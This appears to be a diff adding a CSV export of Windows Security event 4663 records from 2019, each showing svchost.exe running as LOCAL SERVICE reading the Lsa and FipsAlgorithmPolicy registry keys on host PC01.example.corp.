+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x1ac
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452904
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x1ac
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452903
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x420
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452902
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x420
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452901
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x1ac
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452900
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x1ac
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452899
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x420
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452898
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x420
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452897
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x1ac
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452896
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x1ac
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452895
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x420
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452894
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x420
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452893
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x1ac
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452892
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x1ac
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452891
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x420
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452890
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x420
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452889
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x1ac
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452888
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x1ac
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452887
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x420
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452886
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452885
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x420
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452884
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452883
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x520
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452882
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x520
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452881
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452880
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452879
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x520
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452878
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x520
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452877
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452876
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452875
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x520
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452874
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x520
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452873
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452872
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452871
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x520
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452870
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x520
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452869
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452868
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452867
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x520
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452866
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x520
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452865
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452864
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x468
+ %%4432
+
